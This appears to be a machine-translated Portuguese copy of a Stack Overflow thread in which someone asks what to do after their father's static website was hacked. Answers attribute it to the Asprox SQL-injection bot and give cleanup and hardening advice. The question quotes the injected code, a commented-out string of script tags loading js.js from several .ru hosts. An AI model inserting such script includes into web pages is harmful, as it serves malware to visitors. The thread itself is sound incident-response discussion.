Meu site foi hackeado..O que devo fazer?[fechado]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianPergunta
Meu pai me ligou hoje e disse que as pessoas indo para o seu web site foram ficando 168 vírus tentando download para os seus computadores.Ele não é técnico, e construído a coisa toda com um editor WYSIWYG.
Eu apareci de seu site aberto e visto a fonte, e havia uma linha de Javascript inclui, na parte inferior da fonte de direito antes do fechamento de tag HTML.Eles incluíram este arquivo (entre muitos outros): http://www.98hs.ru/js.js <-- DESATIVAR O JAVASCRIPT ANTES DE IR PARA A URL.
Então eu comentou-lo para o agora.Acontece que sua senha de FTP foi um simples dicionário a palavra de seis letras, por isso acho que ele foi hackeado.Mudámos a sua palavra-passe para um dígito 8+ não-palavras (ele não iria para uma frase-chave, já que ele é um caça-n-peck typer).
Eu fiz um no whois 98hs.ru e achei que está hospedado em um servidor no Chile.Há, na verdade, um endereço de correio electrónico associado a ele também, mas eu duvido seriamente essa pessoa é o culpado.Provavelmente algum outro site que foi hackeado...
Eu não tenho nenhuma idéia do que fazer, mas como eu nunca lidou com esse tipo de coisa antes.Alguém tem alguma sugestão?
Ele estava usando plain jane onu-ftp protegido através de webhost4life.com.Eu nem vejo uma maneira de fazer sftp em seu site.Eu estou pensando o seu nome de utilizador e a palavra-passe tem interceptado?
Assim, para tornar isso mais relevantes para a comunidade, quais são os passos que você deve tomar/práticas recomendadas que você deve seguir para proteger o seu website a partir ficar hackeado?
Para o registro, aqui é a linha de código que "magicamente" foi adicionada ao seu arquivo (e não é no seu arquivo no seu computador -- eu deixei ele comentou só para fazer absoluta certeza de que ele não vai fazer nada nesta página, embora eu tenho certeza que Jeff seria de se proteger contra isso):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Solução
Tentar reunir o máximo de informação possível.Veja se o host pode dar a você um registro que mostra todas as conexões FTP que foram feitas para sua conta.Você pode usá-las para ver se era mesmo uma conexão FTP que foi usado para fazer a alteração e, possivelmente, obter um endereço de IP.
Se você estiver usando um pré-moldados de software, como Wordpress, Drupal, ou qualquer outra coisa que não de o código pode haver vulnerabilidades no código de carregamento que permite que esse tipo de modificação.Se ele é construído de forma personalizada, verifique todos os lugares onde você permitir que os usuários fazer upload de arquivos ou modificar ficheiros já existentes.
A segunda coisa seria fazer um dump do site como-é e verifique tudo o que para outras modificações.Pode ser apenas uma única modificação que fiz, mas se eles tem na via FTP quem sabe o que mais está lá em cima.
Reverter de volta seu site em bom estado e, se necessário, atualize para a versão mais recente.
Há um nível de retorno que você tem que levar em conta também.É o dano que vale a pena tentar acompanhar a pessoa para baixo, ou é algo que você só viver e aprender e usar senhas mais fortes?
Outras dicas
Eu sei que isto é um pouco tarde no jogo, mas a URL mencionado que o JavaScript é mencionado em uma lista de sites conhecidos por ter sido parte do ASPRox bot ressurgimento, que começou em junho (ou pelo menos, quando estávamos chegando sinalizado com ele).Alguns detalhes sobre ele são mencionados abaixo:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
A pior coisa sobre isso é que, efetivamente, cada varchar tipo do campo no banco de dados é "infectado" cuspir uma referência para esta URL, em que o navegador recebe uma pequena iframe que o transforma em um robô.Um básico de SQL correção para esse pode ser encontrada aqui:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
O assustador coisa, porém, é que o vírus olha para as tabelas de sistema para valores de infectar e um monte de planos de hospedagem compartilhada também compartilhar o espaço do banco de dados para seus clientes.Provavelmente não era o mesmo do seu pai site que foi infectado, mas alguém do site dentro de sua hospedagem de cluster que escreveu alguns pobres código e abriu a porta para o ataque de Injeção de SQL.
Se ele não tiver feito isso ainda, eu teria de enviar um email URGENTE para o seu host e dar-lhes um link para o código SQL para correção de todo o sistema.Você pode corrigir os seus próprios afetados tabelas de banco de dados, mas o mais provável é que os bots que estão fazendo a infecção vai passar através do buraco de novo e infectar todo o lote.
Espero que este dá-lhe mais algumas informações para trabalhar.
EDITAR:Mais uma rapidez de pensamento, se ele está usando um dos anfitriões on-line ferramentas de design para a criação de seu site, todos os de que o conteúdo é, provavelmente, sentado em uma coluna e foi infectado que forma.
Você mencionou que seu Pai estava usando um site da ferramenta de publicação.
Se a ferramenta de publicação publica a partir de seu computador para o servidor, ele pode ser o caso que os seus arquivos locais são limpos, e que ele só precisa de voltar a publicar no servidor.
Ele deve ver se há um diferente método de login para o seu servidor de simples FTP, embora...isso não é muito seguro, pois ele envia sua senha de texto não criptografado através da internet.
Com seis caractere de palavra-passe, ele pode ter sido ataque de força bruta.O que é mais provável que a sua ftp sendo interceptados, mas pode ser isso também.
Iniciar com uma senha mais fortes.(8 caracteres ainda é bastante fraco)
Veja se este link para uma internet blog de segurança é útil.
O site é simplesmente HTML estático?i.e.ele não gerenciado para código próprio de um carregamento de página que permite que qualquer pessoa condução para fazer o upload comprometida scripts/pages?
Por que não pedir webhost4life se têm registros de FTP disponíveis e relatar o problema para eles.Você nunca sabe, eles podem ser bastante receptivo e descobrir para você exatamente o que aconteceu?
Eu trabalho para uma compartilhado hoster e sempre bem-vindo relatórios, tais como estas, e geralmente pode identificar o exato vetor de ataque e aconselhar a respeito de onde o cliente deu errado.
Desligue o servidor da web sem fechá-lo para baixo para evitar os scripts de desligamento.Analisar o disco rígido, através de outro computador como uma unidade de dados e veja se você pode determinar o culpado por meio de arquivos de log e coisas dessa natureza.Verifique que o código é seguro e, em seguida, restaurá-lo a partir de uma cópia de segurança.
Isso aconteceu com um cliente meu, recentemente, que estava hospedado em ipower.Eu não tenho certeza se o seu ambiente de hospedagem foi baseado em Apache, mas se foi certifique-se de verificar duas vezes para .htaccess que você não criou, particularmente acima da webroot e dentro de diretórios de imagem, como eles tendem a injetar um pouco de maldade lá também (eles estavam redirecionando pessoas, dependendo de onde eles vieram nos consultar).Verifique, também, qualquer um que você fez para criar o código que você não escreveu.
Nós havia sido cortado do mesmo caras aparentemente!Ou bots, no nosso caso.Eles usaram de injeção de SQL em URL em alguns antigo ASP clássico sites que ninguém se manter mais.Encontramos atacando IPs bloqueados e eles no IIS.Agora, devemos refatorar todo o antigo ASP.Então, meu conselho é dar uma olhada em logs do IIS primeiro, para descobrir se o problema está no seu código do site ou o servidor de configuração.
